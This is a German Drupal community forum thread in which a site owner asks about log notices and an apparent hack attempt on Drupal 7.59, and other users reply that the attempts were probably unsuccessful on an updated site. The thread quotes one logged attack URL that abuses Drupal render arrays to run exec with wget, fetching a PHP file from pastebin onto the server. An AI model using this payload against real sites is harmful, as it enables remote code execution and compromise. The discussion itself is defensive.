Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

[gelöst] Notices warnings und hack attempt in Drupal 7.59

Eingetragen von Jenna (1883)
am 30.05.2018 - 20:49 Uhr in
  • Allgemeines zu Drupal
  • Drupal 7.x oder neuer

Ich habe seit einigen Tagen in den Protokollberichten einige dieser Warnungen, die mit PHP angezeigt werden oder Zugriff verweigert.

https://www.drupal.org/project/drupal/issues/2975433

Zitat:

Notice: Undefined index: #prefix in file_ajax_upload() (line 287 of /var/www/html/modules/file/file.module)

, plus 3 - 4 weitere Meldungen, die sich auf ajax beziehen

und

https://www.drupal.org/forum/support/post-installation/2018-04-24/hack-a...

Zitat:

https://www.example.com/?q=user/password&name[%23post_render][]=exec&name[%23markup]=wget+-O+misc%2fAuthCommon.php+https%3a%2f%2fpastebin.com%2fraw%2fmibqDZX4&name[%23type]=markup

Kann jemand helfen, ich werde aus den Issues nicht schlau ob man was unternehmen muß? Was genau steht da soll man tun?
Module und Core sind natürlich auf neuestem Stand.

Ich kann keine Veränderung in den FTP Dateien feststellen, auch sonst läuft die Seite normal, trotzdem nervt das.

Die IP's zu diesen Zugriffen habe ich umgehend gesperrt.

Ja, liebe DSGVO... genau für so etwas braucht man Zugriff auf die IP, um die Sicherheit der Seite zu erhalten und das werde ich auch mit "Sicherheit" nicht ändern...

Grüße Jenna

‹ Fatal error: Allowed memory size - nach Umzug bei gleichem Provider [gelöst] Notices warnings und hack attempt in Drupal 7.59 ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Wie ich es verstehe, soll man

Eingetragen von eigentor (1424)
am 30.05.2018 - 21:09 Uhr

Wie ich es verstehe, soll man überhaupt nichts tun.
Man teilt in den Issues mehr die Info, dass es sich um Hack-Versuche handelt.
Die Versuche waren wahrscheinlich erfolglos, wenn du rechtzeitig upgedatet hattest.

In dem einen Issue meint ja einer, sollte man lieber die Notices ausblenden, weil das das Log zuspammt.
Vermutlich wirst du aktuell selber ein Modul schreiben müssen, wenn du die Sachen nicht geloggt haben willst.
Ich persönlich würde lieber den Spam akzeptieren und merken, dass jemand mich zu hacken versucht.
Ich habe immer so viel Error Spam durch aus Faulheit nicht gefixte Fehler in meinem eigenen Code, dass das den Braten auch nicht mehr fett macht...

rufzeichen-logo

  • Anmelden oder Registrieren um Kommentare zu schreiben

Die Meldungen sind rapide

Eingetragen von Jenna (1883)
am 10.07.2018 - 16:20 Uhr

Die Meldungen sind rapide zurück gegangen, da ich die IPs händisch sperre.. nur ganz vereinzelt taucht noch mal so ein Versuch auf.
Ich halte auch nichts davon Notices auszublenden, lieber etwas Handarbeit und man hat langfristig Ruhe..

Vielen Dank für deine Info (Updates hatte ich natürlich auch durchgeführt)

Grüße Jenna

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • Zähler für Admins deaktievieren
  • Zensurmodul gesucht
  • Liste verfügbarer Aktualisierungen
  • Heutige Seitenansichten und Seitenansichten gesamt funktionieren nicht
  • Kontaktformular-Rätsel
  • [gelöst] Drush cr - kryptische Meldung - Wer kann mir das "übersetzen"
  • Freelancer im Raum Konstanz gesucht für Anpassungen einer Vereins-Webseite
  • Maintenance mode läst sich nicht ausschalten
  • Anzeige lässt sich beim Medientyp Video nicht bearbeiten
  • [gelöst] Umstellung von D10.3.6 auf D11.x Fragen
  • Impressum, Kontakt, Datenschutzbestimmungen trotz Wartungsmodus erreichbar
  • [gelöst]Nach letztem Update weiße Seite in den Einstellungen meines Themes
Weiter

Neue Kommentare

  • alter einfach den aufruf
    vor 18 Stunden 13 Minuten
  • KI
    vor 18 Stunden 17 Minuten
  • Moin Moin Werner Es
    vor 5 Tagen 11 Stunden
  • Ich glaub ich habs
    vor 5 Tagen 14 Stunden
  • Danke
    vor 5 Tagen 14 Stunden
  • Danke
    vor 5 Tagen 14 Stunden
  • Seltsam, warum bekomme ich in
    vor 6 Tagen 11 Stunden
  • Die Inhaltsview filtert auf
    vor 6 Tagen 13 Stunden
  • Du könntest in der
    vor 1 Woche 10 Stunden
  • Danke jetzt funzt es
    vor 1 Woche 1 Tag

Statistik

Beiträge im Forum: 249632
Registrierte User: 20015

Neue User:

  • Jaslytuh
  • Anneljak
  • D-User

» Alle User anzeigen

User nach Punkten sortiert:
wla9428
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3852
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 5 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association